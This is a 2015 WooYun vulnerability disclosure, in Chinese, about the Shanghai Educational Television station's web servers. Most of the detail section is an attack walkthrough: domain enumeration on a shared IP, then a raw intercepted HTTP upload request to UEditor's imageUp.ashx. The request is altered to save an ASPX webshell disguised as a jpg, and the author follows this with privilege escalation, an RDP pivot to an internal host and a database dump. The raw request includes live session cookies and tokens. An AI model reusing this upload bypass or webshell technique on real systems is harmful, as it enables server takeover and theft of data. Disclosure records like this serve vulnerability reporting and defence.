当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0135700

漏洞标题:上海教育电视台泄漏所有数据服务器被提权进入可控制所有电视数据

相关厂商:上海教育电视台

漏洞作者: 八神

提交时间:2015-08-23 10:15

修复时间:2015-10-10 08:32

公开时间:2015-10-10 08:32

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-23: 细节已通知厂商并且等待厂商处理中
2015-08-26: 厂商已经确认,细节仅向厂商公开
2015-09-05: 细节向核心白帽子及相关领域专家公开
2015-09-15: 细节向普通白帽子公开
2015-09-25: 细节向实习白帽子公开
2015-10-10: 细节向公众公开

简要描述:

上海教育电视台泄漏所有数据 服务器被提权进入 可控制所有电视数据

详细说明:

官方域名 www.setv.sh.cn IP 101.226.163.131
C段查询同服务器域名查询
IP 101.226.163.131
http://photo.shlll.net
http://www.shlll.net
http://wk.shlll.net
http://renwen.shlll.net
http://chongming.shlll.net
http://www.setv.sh.cn (目标站点)
http://hdz.shlll.net
http://jsmx.shlll.net
http://jcwg.shlll.net
http://cmcourse.shlll.net
http://zzsy.shlll.net
----------------------------------
主站存在注入 但是权限太小 无法进行下一步渗透 所以我来个注册
调转到这个地址http://member.shlll.net/home/signup?redirect=http%3a%2f%2fwww.setv.sh.cn%3a80%2fhome%2flogin.aspx
这个地址的ip是101.226.163.131 查询同服务器域名查询
http://act.shlll.net
http://read.shlll.net
http://news.shlll.net
http://member.shlll.net
http://group.shlll.net
http://api.shlll.net
http://course.shlll.net

漏洞证明:

在注册成功后找到了活动这个连接
地址http://act.shlll.net/event/addtopic/AC644B5A6C0FCB1B?t=1
发表话题 图片上传
burpsuite
利用burpsuite截取上传数据
burpsuite利用方式就是监听本地127.0.0.1 8080端口
浏览器本地改成127.0.0.1 8080端口 代理
然后把咱们的APSX直接上传大马图片格式
<code>POST /resources/ueditor1_3_6-utf8-net/net/imageUp.ashx HTTP/1.1
Accept: */*
Accept-Language: zh-CN
Referer: http://act.shlll.net/resources/ueditor1_3_6-utf8-net/dialogs/image/imageUploader.swf
x-flash-version: 18,0,0,232
Content-Type: multipart/form-data; boundary=orpiogfilwiyqmkgbuoqjodpnweskmeo
Cache-Control: no-cache
Content-Length: 70592
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727)
Host: act.shlll.net
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: Hm_lvt_6ca93febbe5f3e3b14f8ee9b8ef13802=1439509179,1439509524,1439511290,1439517580; Hm_lvt_2751ab5a36b166d5189be84639504c28=1439357592,1439361016,1439509375,1439517814; KeyId=201508140927532463328; Hm_lpvt_6ca93febbe5f3e3b14f8ee9b8ef13802=1439517930; Hm_lpvt_2751ab5a36b166d5189be84639504c28=1439517433; __RequestVerificationToken=ygQ0xc7HSBQFyqsH1EUYo1uisFhl-PF8deafnZlcfsaqK7jYwMBBnLurG0HG4hvPi0MvzRDbsnwt0uXdo7IYop1GOtru69Nf93NmVhkSyB41
--orpiogfilwiyqmkgbuoqjodpnweskmeo
Content-Disposition: form-data; name="fileName"
?¤???? PHPJackal.jpg
--orpiogfilwiyqmkgbuoqjodpnweskmeo
Content-Disposition: form-data; name="pictitle"
?¤???? PHPJackal.jpg
--orpiogfilwiyqmkgbuoqjodpnweskmeo
Content-Disposition: form-data; name="fileNameFormat"
{time}{rand:6} 这里我直接改成aa.aspx
--orpiogfilwiyqmkgbuoqjodpnweskmeo
Content-Disposition: form-data; name="Filename"
?¤???? PHPJackal.jpg
--orpiogfilwiyqmkgbuoqjodpnweskmeo
Content-Disposition: form-data; name="dir"
upload
--orpiogfilwiyqmkgbuoqjodpnweskmeo
Content-Disposition: form-data; name="upfile"; filename="jpg" 这里我修改成jpg格式
Content-Type: application/octet-stream


下面的是马的资料 咱们可以不管 重要的上面修改
我们继续渗透主站 在主站又找到了 这个连接http://act.cmsqw.com/Activities/Activities126.html 最又下角 (新建话题)
http://act.cmsqw.com/event/addtopic/87F6282F86E56675?t=1
相同以上方法利用 burpsuite 截包数据修改
拿到了shell
成功提权 但发现目标的IP是内网10.13.2.1 而这个竟然没有开3389 所以本大神就直接从刚才我们提权全到的服务器进行10.13.2.1:3389连接
看到了目标站 然后数据库又爆了出来

1.png


2.png

3.png


4.png


5.png


6.png


7.png

修复方案:

修复上传脚本 对服务器进行限3389内网访问 禁止代理访问!

版权声明:转载请注明来源 八神@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-08-26 08:31

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给上海分中心,由其后续协调网站管理单位处置.

最新状态:

暂无